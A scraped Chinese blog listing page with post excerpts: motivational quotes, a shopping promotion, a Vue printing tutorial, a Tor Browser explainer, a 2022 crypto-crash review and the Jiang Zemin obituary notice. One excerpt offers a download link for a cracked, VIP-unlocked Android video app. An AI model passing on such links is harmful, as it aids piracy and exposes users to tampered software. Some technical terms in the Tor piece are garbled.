• 什么是Tor?Tor浏览器更新有什么用?什么是Tor?Tor浏览器更新有什么用?
  • 难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开
  • 中华人民共和国网络安全法中华人民共和国网络安全法

今日发布7篇文章 | 本站共发布了769篇文章
  • 祝自己越来越好的励志文案 祝自己事业越来越好的说说

    1.阳光穿透云层;春天的气息,冰下创业的希望,在你奋斗的脚步声中出现!祝你成功成就! 2.成功的人有非凡的自信。换句话说,他们相信自己,相信自己漂亮,相信自己很好,并且无论如何都比别人好! 3.友谊建立!爱被维护!痛是倾诉!过去只是回忆!而你属于我,我在你心里! 4.梅花香来自苦寒,刀锋来自磨砺。你会成功的!竞争总是有风险的。如果你敢于承担风险和责任,你就能在竞争中获胜。 5.德性佳,业绩棒,众望所归恭祝:实至名归理应当!常表率,勤躬行,心悦诚服恭贺:圆满收官顺自然! 6.诚挚邀请海内外客商,真诚架起一座桥梁,让我们在互利的道路上来来去去自如,携手同行,走向四面八方。 7.高山上的人总是比平原上的人先看到日出。如果你有远见,你的事业必定会有辉煌的未来。我祝你有一个美好的未来! 8.新的一年象征着新的进步、新的成功、新的希望。新年伊始,希望我们能在新的一年里更好地合作。 9.祝你运顺,好事美事皆成双,幸福美满福运淌。 10.让家乡变的更美,是一种品味;让地球变的更美,是一种品德;节能减排低碳生活,美化地球改变华夏。低碳生活,我们携手倡导,由我做起。 11.天幕徐徐拉开,清风袅袅吹来,问候轻轻送来,一身轻松自在,登上事业舞台,开创美好未来,幸福花儿盛开,愿你天天愉快! 12.早上迎着晨曦,晚上披着晚霞,在林立的高楼穿梭,两点一线的忙着生活,职场辛苦,难免疲惫,偶尔歇歇脚,散散心,平安是福,健康才好。 13.你,升了职,涨了薪,发了财,美了心;我,许了愿,发了信,讲了话,送了福;愿你升职快乐,事业节节升,生活步步高! 14.坚持理想,努力追求;跌倒站起,永不回头;面对失败,绝不退后;坚守成功,再加把油;有此毅力,迟早成功,伴你左右;逍遥人生,最终拥有! 15.回南天,雾气重,冲破潮湿,我把祝福送,愿您冲云破雾生活蒸蒸日上,腾云驾雾事业步步高升,云开雾散心情快乐无忧,一切烦恼雾散云消顺心如意! 16.又是上班时间到,短信送你我的关怀:送你如意,把烦恼打败;送你快乐,把忧伤击倒;送你轻松,把忙碌扫除;送你吉祥,把工作早完结。祝你工作如意,心情愉快! 17.理想是帆,有坚定健康的理想,必定也会有耐晒抗雨的帆,海风偶尔会让帆动摇不定,但只要心在跳心在思,总能迎风起帆,到达心中的彼岸。 18.问路才不会迷路,留退路才不会有绝路,敢回头就没有死路。失去了不一定是失败,成功了也不一定是成就,可以逃避现实,但不能逃避人生。 19.不要流泪,不要伤悲,不要颓废,不要自卑,振作起来,美好未来充满光辉!看我给了你安慰,还不快请我喝一杯,不然你就是窝囊废!哈哈,祝你事业有成,振翅高飞! 20.你不想安逸自在,你承担着繁重的负担,在别人望而却步的地方自己创业。我真诚地祝你成功! 21.清风对你非同凡响,别让无情的太阳晒你。奔放的阳光和健康的你在这里。 22.天天祝福你,好东西追你,幸福盯着你,病离你而去,痛苦离你远去,幸福跟着你,一切都跟着你,成功属于你! 23.新店开张送祝福,送对联表情。上联:生意兴隆,财如海;夏联:客如流,钱如潮。横批:生意好。 24.名店名扬天下;迎宾楼房间爆满。厨房下新鲜烹制,每个庭院都会举办中式宴会;酒置于庙中,仙子饮瓶醉寒。 25.如果我们失去了我们的马匹,我们会很高兴,或者上帝会为你打开一扇窗,为你关上一扇门。赢家坚信他们可以改变局面。 26.真正在努力的,日子是不会舒服的。把自己变优秀,其他的事情自然就会跟着好起来,会讲究,能将就,能享受最好的,也能承受最坏的。亲们早安! 27.搜集每一次的真诚,让我们感受合作的愉快;寻找每一份的真情,让我们携手共创未来;送上每一天的问候,愿您事业一帆风顺。 28.人生有时候事业无成,就像河流没有融入大海,这是力量不够,或者没有找对方向。如果你把点点滴滴积涓成流,总有一天会浩浩荡荡,惊涛拍岸的。 29.把弯路走直的人是聪明的,因为找到了捷径;把直路走弯的人是豁达的,因为可以多看几道风景;路不在脚下,路在心里。早安,愿好! ...

    2023-01-06 心灵鸡汤 31
  • 2022天猫年货节来啦!每天抽红包!

    12点整淘宝红包专属加码来袭,必中4元红包,拼手速共10万份!抽到的红包可以无门槛使用,叠加各种大促优惠,积少成多,直接抵现!坚持每天抽,也就几秒的事情!活动地址:https://m.tb.cn/h.U9dWh4m(淘口令:¥1w5pd4ZEZIs¥)活动时间:2022.12.27-2023.01.10 ...

    2023-01-06 值得一看 27
  • vue实现打印及导出

    安装命令: npm i vue-to-pdf --save npm i vue-easy-printer --save 绑定事件 <div id="exportPdf" ref="exportPdf"> </div> <input type="button" @click="printPdf">打印</input> <input type="button" @click="savePdf" >导出(pdf)</input> savePdf(){ this.$PDFSave(this.$refs.exportPdf, "我的文件"); }, printPdf(){ this.$easyPrint(\'exportPdf\',"我的文件",\'portrait\'); } 另外一个打印安装 npm install vue-print-nb --save 全局注册 import Print from 'vue-print-nb' Vue.use(Print); 使用 用v-print指定需要打印的div容器,本次叫printTest。最好使用行内样式,使用组件库部分样式可能不能生成。 <div id="printTest" > <p>锄禾日当午</p>       <p>汗滴禾下土 </p>       <p>谁知盘中餐</p>       <p>粒粒皆辛苦</p>     </div>     <button v-print="'#printTest'">打印</button> 不打印区域 <div class="no-print">不要打印我</div>  ...

    2023-01-06 技术教程 17
  • 什么是Tor?Tor浏览器更新有什么用?

    前言:近期Tor项目团队近日宣布,发布Tor浏览器11.5版本。Tor被美国国家安全局(NSA)誉为“互联网匿名系统之王“。Tor ( The Onion Router)系统就是洋葱路由技术的具体实现。 近期Tor项目团队近日宣布,发布Tor浏览器11.5版本,而此次更新1.帮助用户自动绕过互联网审查2.HTTPS 默认开启3.对网络设置菜单进行了重大改进。说起TOR浏览器都略有耳闻,那么Tor是什么样的技术原理?到底要如何应用? 什么是Tor 如今互联网已经是我们最常用的交流平台,一切痕迹在互联网上都有迹可循。为了掩饰上网时的个人信息与身份,保护个人隐私和安全,各种网络匿名冲浪技术应运而生,而洋葱路由(Onion Routing)技术和Tor ( The OnionRouter)系统则在它们当中脱颖而出,并被美国国家安全局(NSA)誉为“互联网匿名系统之王“。 要知道,电脑能够上网是以互联网编号分配机构(IANA,Internet Assigned Numbers Authority)分配的IP地址为前提,互联网的IP数据包由包头和数据载荷组成。数据载荷可经加密以防被第三方窥视,但包头包含发送方和接收方的IP地址、数据载荷长度、发送时间等信息,如果网站手动攻击用户的上网地点、访问网站、身份背景以及通联关系可能会被盗取。 洋葱路由( Onion Routing)技术综合运用了随机多跳路由、多层封包、多重加密等技术手段,可以实现可靠的在线匿名。1996年Reed,M.G.P.F. Syverson,和D. M. Goldschlag提出的匿名通信算法,基本原理等同于Chaum,D. L.的 Mix 匿名通信算法,随后由美国海军提出的和孵化的,它的初衷是保护政府通信以及为情报界和军队的网络活动提供匿名掩护和身份保护。 洋葱头路由的目的是为基于TCP的应用提供低延迟的匿名通信服务,如web访问,即时通信等。洋葱头路由算法基于通道(Circuit)实现数据报文的路由和传输。算法在网络中通过若干个节点建立通道,通过通道传输后续的用户数据。 Tor ( The Onion Router)系统就是洋葱路由技术的具体实现。Tor Project公司开发的Tor软件—Tor Project、一些大学和机构提供的一组核心Tor路由器与全球志愿者提供的数以千计的Tor路由器,共同组成了一个免费、开源的互联网匿名系统—Tor。Tor目前以参与者志愿提供中继节点的方式广泛地部署在Internet 中,是Internet中最成功的公共匿名通信服务。 Tor的设计引入完美的前向机密(perfectforwarsecrecy、拥塞控制(congestiopcontro)、口亟服务(directory service)、完整性校验(gintesrity checking)。可配置的出口策略(configurable exit policies)和端到端完整性校验等机制,解决了第一代洋葱头路由匿名通信系统设计的种种问题。 Tor有两种实体,分别是Tor用户(Tor user)和Tor节点(Tor node)。Tor节点提供中继服务,是Tor 网络的主体。Tor用户在系统中运行本地代理Onion Proxy (OP)程序,该程序选择中继节点,通过中继节点建立通道,接收应用TCP数据流,并将该数据流通过已建立通道传输。 每个Tor 节点都具有一组身份秘钥(identitykey)和-一组洋葱头秘钥(onion key)。身份秘钥用来签署Tor 节点的路由描述符。路由描述符是一个集合,包括该节点的洋葱头秘钥、地址、带宽、出口机制等,注册在目录服务中。洋葱头秘钥用来建立传输通道以及协商传输的会话秘钥。   二、Tor应用的双面性 任何技术都是双面性的,Tor提供了保护用户隐私的匿名通信服务。通过Tor网络传输的用户通信,既有合理合法的用户行为,也有滥用的行为。由于Tor网络的机制是出口节点代表用户访问最终的目的服务,因此当出现滥用行为时,目的服务看到的是出口节点发起的恶意行为,其直接结果往往是目的服务阻止出口节点访问,从而使所有通过该出口节点访问同样目的服务的通信都被阻止。 Tor网络中部分传输流量的内容为不安全的应用协议,如Telnet、POP3 等。因此部分恶意Tor节点,当其作为传输通道的出口节点时,则运行相应的记录程序,对传输的敏感数据进行记录。如记录的Telnet或 POP3协议中密码传输的用户名和口令,并用作商业的用途,出售给相关的公司和机构。现在国内一些科技公司开发了检测IP代理的软件,用来检测Tor连接,防止欺诈、加强流量过滤、避免虚假账号注册等问题。   三、关于Tor浏览器11.5版本 本次Tor的更新是关于三大方面: 1.自动绕过互联网审查(Auto block bypassing)   2.HTTPS 默认开启(HTTPS on by default) 版本11.5 中的另一个重要新功能是将“HTTPS 模式”设为默认浏览模式,以便通过隧道进行连接。这确保了用户和托管网站的服务器之间的所有数据交换都将被加密,以防御中间人 (MitM) 攻击并保护用户免受恶意出口中继的 SSL剥离。 网络设置菜单更改为“连接设置“(Better settings) Tor 浏览器 11.5 的第三个重大改进是对网络设置菜单进行了重大改进,现在称为“连接设置”,它应该更容易找到和理解特定设置。最值得注意的是,桥接配置和连接选项已经过重新设计,以实现快速轻松的审查和管理。 在保存的桥上使用表情符号,新界面首次提供了配置的可视化,便于识别正确的桥并在需要时方面快捷的选择它。 如今TORDE 的用户数已经超过十万,如军事、情报机构、记者等以及超过75个国家的6011个继电器提供在线匿名和隐私保护。...

    2023-01-04 技术教程 63
  • 2022年度币圈年度回顾

    2022年度对于加密货币行业来说是极不平凡的一年,在这不平凡的一年里,加密领域从年初近3万亿市值顶峰一路下行,在俄乌冲突、全球通胀、疫情持续蔓延的背景下,持续阴跌,这个过程没有像样的反弹,先后经历了Terra崩盘、三箭暴雷、FTX破产等多起影响深远的黑天鹅事件,加密货币市场价值暴跌,比特币一度跌破15500美元,加密货币行业再次经受重大考验。加密货币行业跟其他投资行业一样,历来是牛短熊长,虽然整个行业大幅缩水,比特币也跌破了上一周期的高点,但熊市恐怕还没有这么快结束,唯一的好消息是我们终于又熬过了一年熊市,离下一轮牛市又近了一点,在此,带你一起来回顾2022年度机密货币领域的五大事件 Top5 黑客攻击romin网络窃取6.23亿美元Ronin 是热门NFT游戏Axie Infinity的底层区块链,Ronin 和Axie Infinity运营商 Sky Mavis3月23日早上在一篇博客文章,宣布遭遇黑客攻击,黑客利用该网络洗劫了大约 6.25 亿美元(173,600 枚以太坊和 2550 万USDC)。这一数字超过了 2021 年 8 月 DeFi 协议 Poly Network 遭受的 6.11 亿美元黑客攻击 根据 Sky Mavis 的说法,Ronin 之所以遭受攻击,部分原因是该公司在去年 11 月走捷径来缓解网络“巨大的用户负载”,网络游戏在去年1月之后人气激增,,非常受菲律宾和其他国家的玩家的欢迎,甚至依靠它作为一个全职工作。该系统于去年12月停止使用,但允许它使用的权限从未被撤销。除了攻击Sky Mavis自己的四个节点外,攻击者还利用这些节点访问其拥有的Axie DAO管理的一个节点。在破坏九个验证器节点中的五个后,攻击者可以威胁任何交易安全性,并提取任何他们想要的资金。Sky Mavis表示,他们将把交易所需的节点数量增加到8个,一旦确定没有更多资金可用Top4  terra崩盘在其鼎盛时期,Terra是世界上市值最大的加密货币之一。由于原生稳定币UST的成功,Terra在2021年底到2022年初生态异常繁荣。与大多数稳定币相反,UST依靠算法机制来保持与美元的锚定。该系统让用户通过燃烧等量的Terra的波动性LUNA币来铸造新的UST代币,或者用UST赎回新的LUNA币。LUNA 生态系统和稳定机制的关键是 Anchor,它将很多 UST 存入其中以获得高额收益。在其巅峰时期,Anchor 持有流通中所有 UST 的近 75%——这使得 UST 的价值高度依靠于 Anchor 的运作。在高峰期,Terra生态系统的价值超过400亿美元2022 年 5 月,价值 20 亿USD的 UST 从 Anchor 协议中撤出并清算。这给 LUNA 带来了重压,由于套利者试图借助价格差异,从而扩大了 LUNA 和 UST 之间的差距,而 UST 本来就不应该变得这样之大。Luna 基金会试图通过向系统中注入更多的 UST 来弥补这一差距(记住 UST 在 LUNA 被铸造时被销毁),试图重新控制并平衡两种数字货币的价格。但Terra的算法推动LUNA大量增发,LUNA & UST因此进入死亡螺旋,最后导致崩盘。币luna价格从4月的119美元跌至0.0001972美元,接近归零,一系列连锁反应由此开始。Top3 Celsius、3AC引发加密连锁地震Terra在5月爆暴雷,让投资者损失数百亿美元,引起多地政府监管。而到6月中旬,Do Kwon的 "劳动 "成果已经进入集中式零售加密货币市场,影响愈发恶化。6月12日晚,Celsius提醒其客户,它正在暂时但无限期地搁置提款。Celsius投资Terra公司,随着其投资变得资不抵债,连锁反应频出。Celsius借款和贷款大多发生在少数公司的封闭网络中,其在Maker、Compound和Aave等去中心化平台上贷款,但也向Genesis、Galaxy Digital和Three Arrows Capital等中心化实体大量贷款。在Celsius宣布的几天内,关于3AC破产的传言开始流传,指三箭资本面临流动性问题,也有消息指该公司疑似挪用客户资金。此后,数字资产经纪公司Voyager Digital表示,已经向三箭资本出借15,250个比特币和3.5亿美元的稳定币USDC。按当时的价格计算,贷款总额超过6.75亿美元。Voyager Digital公司要求三箭资本在6月27日前偿还全部未结清贷款,否则将面临违约。事情曝光后, 其他三箭资本的借贷人纷纷要求三箭资本偿还贷款, 包括Genesis Global Trading BlockFi,BitMex,FTX,及Blockchain等等。三箭资本被迫出售其资产,更一度在curve上的stETH/ETH池大幅抛售8万枚stETH (超过 8400 万美元), 导致stETH脱锚 (stETH曾经一脱锚到0.94ETH)。Top2  Ftx暴雷11月2日,加密货币新闻网站CoinDesk披露了由SBF先后创立的对冲基金Alameda Research及FTX交易平台之间的关系,在Alameda的资产负债表上有146亿美元,FTT为其最大单一资产,约持有1.4亿枚,价值58亿美元,占其净资产的 88%,同时1.4亿枚占FTT两亿枚流通量的70%,消息一出瞬间引爆币圈。11月6日,与FTX有千丝万缕关系的币安创始人赵长鹏表示,担心FTT会发生像Luna那样瞬间崩溃的状况,未来几个月内将要抛售超2300万枚FTT,SBF和赵长鹏的大战开启,拉开了FTX崩盘的序幕。SBF看到赵长鹏抛售FTT,表示立即花22美元/币的价格购买币安所有要抛售的FTT,FTX和币安的大战进入白热化状态。币安和FTX作为加密货币交易平台的前三,已形成大而不倒的态势。某硅谷分析师认为,赵长鹏和SBF已成为加密圈非常重要的领军人物,无论如何争吵,只有永远的利益,相信加密行业仍将在各方共同利益驱动下继续前行。殊不知,FTX正在成为下一个LUNA。随着Alameda资产负债表的爆出,引发投资者对Alameda和FTX可能遭遇流动性危机的担忧。加上赵长鹏率先抛售FTT,恐慌情绪开始蔓延,认为SBF资不抵债。CoinDesk的报道称,FTX成立目的是为了给Alameda大量筹集资金,Alameda通过低价买入FTT,通过营销将FTT价格推高,接着再以高价FTT作为抵押,向FTX客户们贷款,用高杠杆成倍扩大自己交易利润。在高杠杆及币圈巨大的波动下,SBF的巨大泡沫早有破产预兆。当人们意识到FTX会成为下一个LUNA时,开始纷纷从FTX中提取资金,FTX遭遇约60亿美元的挤兑。紧接着,FTX关闭了以太坊等主流货币的区块链转账,FTX面临了史无前例的危机。赵长鹏作为FTX危机的导火索,将SBF推向绝境。面对岌岌可危的FTX,币安成了SBF的救命稻草。SBF寻求赵长鹏的收购,赵长鹏确认与币安签定了无约束力的意向书,有意收购FTX。11月9日,赵长鹏在推特上表示:FTX向我们求助,他们存在大量的流动性挤兑,为保护用户,币安有意全面收购FTX,帮助化解流动性危机,币安将在未来几天内进行尽职调查。一天后,币安表示尽职调查显示FTX陷入流动性危机,FTX的债务和资产之间的差距可能超过60亿美元,且面临监管部门调查,币安决定放弃收购FTX。随即FTT开启暴跌模式,价格暴跌90%。比特币也跌破16000美元,创2020年11月以来的最低点。面对资不抵债的尴尬境地,FTX宣布在美国申请破产,FTX表示有超10万名债权人,资产和负债在100亿至500亿美元量级。FTX上演了Celsius的悲剧,FTX的储户将陷入“OFO小黄车”漫长的提款等待期。FTX的崩盘可谓是币圈的“雷曼危机”,引爆比LUNA陷入“死亡漩涡”更危险的币圈地震Top1 以太坊完成 "合并"尽管坏事频频,但以太坊给加密领域带来了希望曙光,2022年9月15日,以太坊合并顺利完成,标志着以太坊主网的共识机制正式从工作量证明(PoW)过渡至权益证明(PoS)。作为龙头基础设施,以太坊自诞生起便一直使用工作量证明共识机制来保证系统的安全,各种交易、智能合约、账户等复杂功能也都是运行在这一核心机制之上。随着以太坊上生态应用的不断繁荣,当前的基础架构对系统扩展性提出挑战,PoW的局限性严重限制了以太坊的未来发展。为解决可扩展性问题,团队给出了一系列网络升级方案,合并是该系列中的第二次网络升级。对合并的议论从夏天开始,促使市场从6月流动性危机后的绝望中稍稍解脱,而关于分叉的讨论也推动了加密关注热潮。ETH从6月的底部飙升超过100%,看好合并后--99.95%的能源效率提高和90%的ETH排放量削减--能够帮助加密货币逆风翻盘。对以太坊而言,转向PoS为以太坊后续的分片扩容奠定了基础。对行业来说,合并意味着大规模显卡挖矿时代结束,矿工将可能暂别加密主要历史舞台。随着以太坊性能优化,未来势必会挤压其它PoS公链生态。从更深层次的方面来说,合并是以太坊响应全球减少碳足迹号召的重要改变。但由于技术与生态的限制,这一更新的真正影响只有在未来几年才会显现。写在最后:作为熊市的典型,这些些标志性事件也是一些最具灾难性的事件,我们震惊地看着Terra、Three Arrows Capital和FTX像多米诺骨牌一样倒下,2022年也许不是加密货币最灾难性的一年,但至少配得上之一,你觉得呢?...

    2023-01-04 值得一看 26
  • 安卓大师兄影视v3.0.0去广告VIP绿化版

    软件介绍 大师影视,安卓影视聚合应用,采集全网影视资源,跟大部分的影视应用稍有不同,大师兄影视主要采用自建高清源,片源存储国内服务器,所有视频无广告水印,支持蓝光1080P/倍速播放/TV投屏功能。 软件截图 版本特点 解锁VIP、去首页横幅广播 去分享标签,界面更加美观 去我的标签无用界面更简洁 禁止开机自启,去更新提示 下载链接:https://dufeng.lanzoum.com/iggwU0jyzbaf ...

    2023-01-03 实用工具 53
  • 告全党全军全国各族人民书

    中国共产党中央委员会中华人民共和国全国人民代表大会常务委员会中华人民共和国国务院中国人民政治协商会议全国委员会中国共产党和中华人民共和国中央军事委员会 告全党全军全国各族人民书 中国共产党中央委员会、中华人民共和国全国人民代表大会常务委员会、中华人民共和国国务院、中国人民政治协商会议全国委员会、中国共产党和中华人民共和国中央军事委员会,极其悲痛地向全党全军全国各族人民通告:我们敬爱的江泽民同志患白血病合并多脏器功能衰竭,抢救无效,于2022年11月30日12时13分在上海逝世,享年96岁。 江泽民同志是我党我军我国各族人民公认的享有崇高威望的卓越领导人,伟大的马克思主义者,伟大的无产阶级革命家、政治家、军事家、外交家,久经考验的共产主义战士,中国特色社会主义伟大事业的杰出领导者,党的第三代中央领导集体的核心,“三个代表”重要思想的主要创立者。 江泽民同志从青少年时代起就勤奋学习,追求真理,受到爱国主义思想和民主革命思想的启蒙。在大学学习期间,经过积极参加抗日爱国活动洗礼,江泽民同志形成了马克思主义世界观,完成了人生道路的选择,最终确立了为民族解放、人民幸福而奋斗的人生理想和信仰。一九四七年从上海交通大学毕业后,江泽民同志到工厂工作,在工人群众中并在青年会夜校职业青年中从事革命宣传工作,一九四九年组织工人群众开展护厂活动,迎接上海解放。 中华人民共和国成立初期,江泽民同志先后担任上海益民食品一厂第一副厂长、上海制皂厂第一副厂长、第一机械工业部上海第二设计分局电器专业科科长等职。一九五四年,国家在长春兴建第一汽车制造厂,需要大批专业技术干部和管理干部,江泽民同志应调前往,一九五五年赴苏联莫斯科斯大林汽车制造厂实习。一九五六年回国后,江泽民同志任长春第一汽车制造厂动力处副处长、副总动力师、动力分厂厂长。一九六二年,江泽民同志调任第一机械工业部上海电器科学研究所副所长,负责该所科研领导工作。一九六六年,江泽民同志调任武汉热工机械研究所所长、代理党委书记,后任党委书记,组织原子能发电设备设计工作。“文化大革命”开始后,江泽民同志受到冲击。一九七〇年,江泽民同志调到第一机械工业部工作,一九七一年任中国第一机械工业部派驻罗马尼亚专家组总组长,一九七三年回国先后任第一机械工业部外事局副局长、局长。一九八〇年,江泽民同志担任国家进出口管理委员会、国家外国投资管理委员会副主任兼秘书长、党组成员,主管实施广东、福建两省实行特殊政策、灵活措施和试办经济特区等开创性工作。一九八二年,江泽民同志任电子工业部第一副部长、党组副书记,一九八三年任部长、党组书记,为我国电子工业发展作出了重要贡献。一九八二年九月,江泽民同志在党的第十二次全国代表大会上当选为中央委员。 一九八五年,江泽民同志任上海市市长、中共上海市委副书记。一九八七年,江泽民同志在党的十三届一中全会上当选为中共中央政治局委员,并任中共上海市委书记。担任上海市长、市委书记期间,江泽民同志带领上海广大干部群众振奋精神、勇于探索,推动上海改革开放和社会主义现代化建设取得重大突破,浦东开发开放蓄势谋篇,推动党的建设、精神文明建设、社会建设取得重大进步。一九八九年春夏之交我国发生严重政治风波,江泽民同志拥护和执行党中央关于旗帜鲜明反对动乱、捍卫社会主义国家政权、维护人民根本利益的正确决策,紧紧依靠广大党员、干部、群众,有力维护上海稳定。 一九八九年,在党的十三届四中全会上,江泽民同志当选为中共中央政治局常委、中央委员会总书记。同年,党的十三届五中全会决定江泽民同志为中共中央军事委员会主席。一九九〇年,在七届全国人大三次会议上当选为中华人民共和国中央军事委员会主席。 江泽民同志是党的第三代中央领导集体的核心。二十世纪八十年代末九十年代初,国际国内发生严重政治风波,世界社会主义出现严重曲折,我国社会主义事业发展面临空前巨大的困难和压力。在这个决定党和国家前途命运的重大历史关头,江泽民同志带领党的中央领导集体,紧紧依靠全党全军全国各族人民,旗帜鲜明坚持四项基本原则,维护国家独立、尊严、安全、稳定,毫不动摇坚持经济建设这个中心,坚持改革开放,捍卫了中国特色社会主义伟大事业,打开了我国改革开放和社会主义现代化建设新局面。 从党的十三届四中全会到党的十六大的十三年中,国际形势风云变幻,我国改革开放和社会主义现代化建设进程波澜壮阔。在国际国内十分复杂的形势下,江泽民同志带领党的中央领导集体,高举马克思列宁主义、毛泽东思想、邓小平理论伟大旗帜,坚持党的基本路线不动摇,团结全党全国各族人民,抓住机遇、深化改革、扩大开放、促进发展、保持稳定,确立了社会主义市场经济体制的改革目标和基本框架,确立了社会主义初级阶段公有制为主体、多种所有制经济共同发展的基本经济制度和按劳分配为主体、多种分配方式并存的分配制度,制定和实施了促进改革发展稳定的一系列方针政策和重大战略,锐意推进经济体制改革、政治体制改革、文化体制改革和其他各方面改革,开创全面改革开放新局面,实施依法治国基本方略,坚持“和平统一、一国两制”的方针,实现香港、澳门顺利回归,坚持独立自主的和平外交政策,打开外交工作崭新局面,推进党的建设新的伟大工程,推动社会主义物质文明、政治文明、精神文明建设取得举世瞩目的新进展,成功把中国特色社会主义推向二十一世纪。在以江泽民同志为核心的党的第三代中央领导集体领导下,我们从容应对一系列关系我国主权和安全的国际突发事件,战胜在政治、经济领域和自然界出现的困难和风险,保证了改革开放和社会主义现代化建设的航船始终沿着正确方向破浪前进。党的十三届四中全会以来十三年我们党和国家取得的巨大成就,同江泽民同志作为马克思主义政治家的雄才大略、关键作用、高超政治领导艺术是分不开的。 江泽民同志担任中央军事委员会主席期间,深刻洞察和把握国内外形势的重大变化和世界新军事变革的发展趋势,对加强国防和军队现代化建设提出了一系列新论断新举措,丰富和发展了毛泽东军事思想和邓小平新时期军队建设思想,创立了江泽民国防和军队建设思想,领导国防和军队现代化建设取得了巨大成就。江泽民同志强调,要坚持国防建设与经济建设协调发展的方针,加强人民军队革命化、现代化、正规化建设;按照政治合格、军事过硬、作风优良、纪律严明、保障有力的总要求,紧紧围绕打得赢、不变质两个历史性课题,全面推进人民军队建设;毫不动摇坚持党对人民军队的绝对领导,始终把思想政治建设摆在我军各项建设的首位,永葆人民军队性质、本色、作风;贯彻积极防御的军事战略方针,推进中国特色军事变革,按照建设信息化军队、打赢信息化战争的目标,坚定不移走中国特色的精兵之路,实现我军现代化跨越式发展;实施科技强军战略,坚持从严治军、依法治军、勤俭建军,探索新的历史条件下治军的特点和规律,与时俱进推进我军各项建设;深化国防科技工业体制改革,增强自主创新能力,加快国防科技和武器装备发展,走出一条投入较少、效益较高的军队现代化建设路子;按照平战结合、军民结合、寓军于民的方针,提高国防动员能力,发展高技术条件下人民战争的战略战术,巩固军政军民团结。这一切,对于加强国防和军队现代化建设具有长远指导意义。 江泽民同志坚持马克思主义的思想路线,尊重实践,尊重群众,准确把握时代特征,科学判断我们党所处的历史方位,围绕建设中国特色社会主义这个主题,在改革发展稳定、内政外交国防、治党治国治军等各方面都提出了一系列新思想新观点新论断,为坚持和发展党的基本理论、基本路线、基本纲领、基本经验作出了杰出贡献。特别是他集中全党智慧创立了“三个代表”重要思想,实现了党在指导思想上的又一次与时俱进,体现了一位真正马克思主义者的巨大政治勇气和理论勇气。“三个代表”重要思想突出强调我们党始终代表中国先进生产力的发展要求、代表中国先进文化的前进方向、代表中国最广大人民的根本利益,遵循了人类历史发展进步的普遍规律,顺应了时代发展潮流和我国社会发展进步要求,反映了全国各族人民利益和愿望,抓住了新形势下提高党的执政能力、巩固党的执政地位、完成党的执政使命的根本。“三个代表”重要思想最鲜明的特点和最突出的贡献,在于用一系列紧密联系、相互贯通的新思想新观点新论断,进一步回答了什么是社会主义、怎样建设社会主义的问题,创造性回答了建设什么样的党、怎样建设党的问题,是对马克思列宁主义、毛泽东思想、邓小平理论的继承和发展,深化了我们对新的时代条件下推进中国特色社会主义事业、加强党的建设的规律的认识。 江泽民同志高度重视事关党和人民事业的重大战略问题。在筹备党的十六大期间,江泽民同志主动提出,为了党和国家事业长远发展,为了党和国家长治久安,他不再担任中央领导职务,并从中央委员会退下来,以利于促进党和国家高层领导新老交替。党中央同意了江泽民同志的请求。从当时国际形势复杂多变、国防和军队建设任务繁重考虑,党的十六届一中全会决定江泽民同志留任中共中央军事委员会主席。党的十六届一中全会后,江泽民同志全力支持以胡锦涛同志为总书记的新一届中央领导集体的工作,尽心尽力履行党中央交付他的职责。二〇〇四年,江泽民同志从党和国家事业长远发展的大局出发,又主动提出辞去他担任的党和国家中央军事委员会主席的职务,充分体现了他对党和国家事业发展的深谋远虑。 从领导岗位上退下来以后,江泽民同志坚决拥护和支持党中央工作,关心中国特色社会主义伟大事业,坚定支持党风廉政建设和反腐败斗争。二〇〇六年,江泽民同志亲自主持编辑和逐篇审定《江泽民文选》第一卷、第二卷、第三卷。《江泽民文选》主要收入了江泽民同志从二十世纪八十年代末至二十一世纪初具有代表性和独创性的重要著作,为我们更深入地学习领会“三个代表”重要思想,继续推进中国特色社会主义伟大事业和党的建设新的伟大工程提供了重要教材。 江泽民同志目光远大、审时度势,总是从中国和世界发展大势、从党和国家工作全局出发观察和思考问题,不断推进理论创新和其他各方面创新。江泽民同志信念坚定、处事果断,总是把党和人民放在心中最高的位置,始终不渝坚持共产党人的理想信念,在关键时刻具有作出果敢决策的非凡胆略和进行理论创新的巨大勇气。江泽民同志尊重实践、与时俱进,总是紧紧把握时代发展脉搏和契机,坚持从党和人民活生生的实践出发总结经验、寻找路子,脚踏实地而又开拓进取推进党和国家各项工作。江泽民同志尊重群众、关心群众,总是高度关注人民群众安危冷暖,依据最广大人民根本利益来检验和推动工作。江泽民同志的优秀品格和高尚风范将永远教育和激励我们前进。 江泽民同志的逝世,对我党我军我国各族人民是不可估量的损失。党中央号召,全党全军全国各族人民化悲痛为力量,继承江泽民同志的遗志,以实际行动表达我们的悼念。 我们一定要更加自觉地团结在以习近平同志为核心的党中央周围,坚持党的基本理论、基本路线、基本方略,深刻领悟“两个确立”的决定性意义,增强“四个意识”、坚定“四个自信”、做到“两个维护”,持之以恒推进全面从严治党,深入推进新时代党的建设新的伟大工程,以党的自我革命引领社会革命,使我们党坚守初心使命,始终成为中国特色社会主义事业的坚强领导核心。 我们一定要坚持马克思列宁主义、毛泽东思想、邓小平理论、“三个代表”重要思想、科学发展观,全面贯彻习近平新时代中国特色社会主义思想,坚持把马克思主义基本原理同中国具体实际相结合、同中华优秀传统文化相结合,坚持解放思想、实事求是、与时俱进、求真务实,勇于进行理论探索和创新,在新时代的伟大实践中不断开辟马克思主义中国化时代化新境界,让当代中国马克思主义放射出更加灿烂的真理光芒。 我们一定要坚定不移坚持中国共产党领导、坚持中国特色社会主义,坚持把国家和民族发展放在自己力量的基点上、把中国发展进步的命运牢牢掌握在自己手中,团结一心为全面建成社会主义现代化强国、实现第二个百年奋斗目标而努力,以中国式现代化全面推进中华民族伟大复兴,推动构建人类命运共同体,创造人类文明新形态。 我们一定要坚持全心全意为人民服务的根本宗旨,树牢群众观点,贯彻群众路线,尊重人民首创精神,坚持一切为了人民、一切依靠人民,从群众中来、到群众中去,始终保持同人民群众的血肉联系,始终同人民同呼吸、共命运、心连心。 我们一定要努力学习“三个代表”重要思想,学习江泽民同志的革命精神和革命风范,学习他运用马克思主义立场、观点、方法研究新情况、解决新问题的科学态度和创造精神,为把我国建设成为富强民主文明和谐美丽的社会主义现代化强国而团结奋斗。 